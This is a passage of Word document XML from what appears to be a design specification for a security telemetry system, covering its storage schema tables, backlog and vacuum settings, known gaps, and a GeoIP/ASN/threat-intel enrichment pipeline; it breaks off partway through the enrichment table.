    <w:p w14:paraId="25F9D2B7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C15865A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Storage Schema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0"/>
        <w:gridCol w:w="3306"/>
        <w:gridCol w:w="3035"/>
        <w:gridCol w:w="1497"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="633656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60D01CA9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Table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2AE863E0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Key Columns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304C521B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Unique Constraint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7AF6A574" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="42D8FA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6A3C315" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wal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37FBE44" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">id, idem, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ts_ns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, bytes, checksum, sig, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>prev_sig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6B3150A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>UNIQUE(idem)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F3AEE68" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Transient queue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="1F88CC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90CF28F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wal_dead_letter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0C21731" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>row_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>error_msg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>envelope_bytes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10071F7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>None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920EF4B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Quarantine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="5E95DA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E1C929E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>process_events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9319D3B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, exe, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmdline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, username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F698E24" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ts_ns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F7ECD47" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Process telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="240733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5E2078A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>security_events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B480782" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>event_category</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>risk_score</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mitre_techniques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554DFEA" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>None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41EFE1B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Security alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="366C73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34D4387" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>flow_events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62464D8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>src_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dst_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, protocol, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bytes_tx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D3D5AEE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>src_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dst_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>src_port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dst_port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ts_ns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5D63998" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Network flows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="7371CC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9A93B84" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_telemetry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C5D3C06" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip_address</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_type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FD4A2CC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ts_ns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B764640" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Device metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="5C5A07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FBC873A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dns_events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E9CB23C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, domain, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>query_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dga_score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C6E6C81" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, domain, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>query_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ts_ns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345805B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>DNS queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="763DA0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4E5C29C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>audit_events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D677BB6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>syscall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, exe, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmdline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601F94B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>None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4C5759C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Kernel audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="4B58B8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541B0F3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>persistence_events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42E2B47" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, mechanism, path, command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A3F03D4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>None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E82CF55" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Boot persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="40AEEF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5A1A7A7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fim_events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5A965D1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, path, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>change_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>old_hash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>new_hash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EB3ECF4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>None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79600F1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>File integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="2B0BAC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219573B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>peripheral_events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1341E6A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>event_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vendor_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w: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77FBA3F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>None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A18F8BF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>USB/hardware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="4F918A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9F6BFF7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>metrics_timeseries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A2F50D5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>metric_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, value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43CB6A5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>metric_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ts_ns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837CBC8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Performance metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="7BBE5A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D7952F8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>incidents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270AADE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">title, severity, status, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>source_event_ids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757D805" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>None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0071BB3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Incident tracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="509DDF21" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5385CF20" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 Backpressure &amp; Vacuum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F67EC2B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Max backlog: 200MB (configurable). Oldest events dropped first (tail-drop).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DC1CE3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Vacuum: After 30% deletion threshold, every 300 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774D268C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQLite mode: WAL journal, synchronous=FULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CCD340" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD12AF8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>3.5 Critical Gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6A5B70" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G6: No maximum backlog age (old events never expire)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7742AE60" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G7: No circuit breaker on downstream failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54289F25" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G8: Chain break count NOT exported as metric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E3B77" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G9: Schema version stored but NOT validated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EC02B8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5931396A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094"/>
    <w:p w14:paraId="507478EA" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 4 — ENRICHMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4F87F2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Pipeline Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491F07B6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Raw </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> → [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>geo_src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">_*] → [ASN: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asn_src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_*] → [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatIntel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: threat_*] → Enriched </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46779ED1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76149FA0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Execution: Sequential. Graceful degradation (skip if DB unavailable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103CA5F4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Status: "enriched" (all OK), "partial" (some failed), "raw" (all failed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7399E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2A09CF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Enrichment Mutation Map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9"/>
        <w:gridCol w:w="1819"/>
        <w:gridCol w:w="3447"/>
        <w:gridCol w:w="1931"/>
        <w:gridCol w:w="1252"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="45464B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00C738E0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Enricher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75DD985A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Input Fields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512AB0A1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Output Fields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6DC6E022" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Database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01917BC8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="75D5A6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4D2D3AB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>GeoIP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70F0A8F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>src_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dst_ip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714D5B5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">geo_*_country, city, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, continent, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>timezone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5575EB7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>MaxMind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> GeoLite2-City.mmdb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3D963C6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>LRU 10K</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="57D934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055FBB9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ASN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DA6B22A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>src_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
